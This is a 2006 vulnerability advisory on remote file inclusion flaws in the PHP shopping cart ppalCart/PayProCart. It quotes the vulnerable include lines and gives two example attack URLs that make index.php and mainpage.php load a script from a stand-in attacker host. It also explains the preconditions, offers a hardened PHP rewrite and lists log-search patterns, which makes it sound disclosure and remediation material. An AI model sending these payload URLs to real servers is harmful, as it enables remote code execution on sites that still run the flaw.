SECURITYVULNS:DOC:14222
Sep 12, 2006

PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities

Source: vulners.com

+-------------------------------------------------------------------

  • ppalCart V(2.5 EE) Remote File Inclusion

+-------------------------------------------------------------------

+-------------------------------------------------------------------
+-------------------------------------------------------------------

  • ./index Directory …
  • [index.php]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include $docroot . "js/css/shop-custom.php";
include $docroot . "js/css/shop-default.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Line --> 50 (of 349)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
else if($proMod) {
include "$proMod" . ".php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Line --> 288 (of 349)
Ex --> http://www.victom.com/index.php?proMod=http://yourevil.com/r0x.txt?cmd

Neither $docroot nor $proMod is initialised by index.php before these includes; both are read as bare globals, so a request parameter of the same name populates them when register_globals is enabled. Because ".php" is appended to $proMod, the trailing "?cmd" in the example turns that suffix into part of the query string sent to the attacker's server, so the remote script is fetched as-is.

+-------------------------------------------------------------------
+-------------------------------------------------------------------

  • [mainpage.php]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "shopincs/commonincs/shop-mainbottom" . "$langFile" . ".php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Line --> 158 (of 308)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "tplates/newitems.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Line --> 284 (of 308)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "tplates/specials.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Line --> 287 (of 308)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "cstmincs/cstmbanner$langFile.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Line --> 290 (of 308)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "tplates/upselladvert.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Line --> 292 (of 308)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "mainincs/upsellproducts.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Line --> 298 (of 308)
Ex --> http://www.victom.com/mainpage.php?docroot=http://yourevil.com/r0x.txt?cmd

In mainpage.php every include is prefixed with $docroot, so one controlled value reaches six include statements; the "?cmd" again pushes the fixed path suffix into the query string of the attacker's URL. Both examples require register_globals to be on (the scripts read $docroot and $proMod, not $_GET) and a PHP configuration that permits URL includes (allow_url_fopen; on PHP 5.2 and later additionally allow_url_include). Where those are off the same code is still a local file inclusion sink for any value of $docroot or $proMod the attacker can set.

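The following is an added example, not ppalCart/PayProCart code, showing how the two patterns above (a request-controlled module name in index.php and a request-controlled $docroot in mainpage.php) can be rewritten so that the client never chooses the included path: $docroot is derived from the script's own location, and the module and language-suffix parameters are mapped through fixed allowlists. The module names, directory layout, the "catalog"/"cart"/"checkout" keys and the language suffixes are assumptions for illustration; the parameter names proMod and langFile are the ones the advisory shows. Assumes PHP 7.1 or later.

```php
<?php
// Added example, not ppalCart/PayProCart source. Hardened replacement for the
// include "$proMod" . ".php" and include $docroot . "..." patterns.
declare(strict_types=1);

// 1. $docroot is never taken from the request (register_globals or otherwise).
//    It is fixed to the canonical absolute directory of this script.
$docroot = realpath(__DIR__);
if ($docroot === false) {
    http_response_code(500);
    exit('cannot resolve document root');
}
$docroot .= DIRECTORY_SEPARATOR;

// 2. The only module names the proMod parameter may take, mapped to the files
//    they load. Keys and paths are hypothetical; the point is that the request
//    selects a key, never a path.
const ALLOWED_MODULES = [
    'catalog'  => 'mainincs/catalog.php',
    'cart'     => 'mainincs/cart.php',
    'checkout' => 'mainincs/checkout.php',
];

// 3. Allowed suffixes for the $langFile concatenation (assumed values).
const ALLOWED_LANG_SUFFIXES = ['', '_de', '_fr'];

/**
 * Map a user-supplied module name to an absolute file under $docroot.
 * Returns null when the name is not on the allowlist or the resolved file
 * is missing or lies outside $docroot.
 */
function resolve_module(string $docroot, string $requested): ?string
{
    if (!array_key_exists($requested, ALLOWED_MODULES)) {
        return null;   // "http://yourevil.com/r0x.txt?cmd" is rejected here
    }
    $path = realpath($docroot . ALLOWED_MODULES[$requested]);
    // realpath() returns false for a missing file and collapses "..", so a
    // prefix comparison against $docroot rejects anything outside the tree.
    if ($path === false || strncmp($path, $docroot, strlen($docroot)) !== 0) {
        return null;
    }
    return $path;
}

/** Constrain the language suffix to the allowlist; unknown values fall back to ''. */
function lang_suffix(string $lang): string
{
    return in_array($lang, ALLOWED_LANG_SUFFIXES, true) ? $lang : '';
}

// Request handling: read parameters explicitly from $_GET, never as globals.
$proMod   = isset($_GET['proMod'])   ? (string) $_GET['proMod']   : 'catalog';
$langFile = lang_suffix(isset($_GET['langFile']) ? (string) $_GET['langFile'] : '');

$target = resolve_module($docroot, $proMod);
if ($target === null) {
    http_response_code(404);
    exit('unknown module');
}
include $target;

// The shop-mainbottom$langFile include from mainpage.php, with $docroot fixed
// and $langFile constrained above. The path prefix and name are now constants.
include $docroot . 'shopincs/commonincs/shop-mainbottom' . $langFile . '.php';
```

The allowlist makes the fix independent of php.ini, but the server settings still matter as defence in depth: register_globals=Off (the directive was removed entirely in PHP 5.4), allow_url_include=Off, and allow_url_fopen=Off where nothing legitimately needs remote streams. An access-log search for "proMod=http" or "docroot=http" (URL-encoded variants included) is a cheap retrospective check for the exact requests the advisory's examples generate.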
+-------------------------------------------------------------------
Eddy_BAck0o
+-------------------------------------------------------------------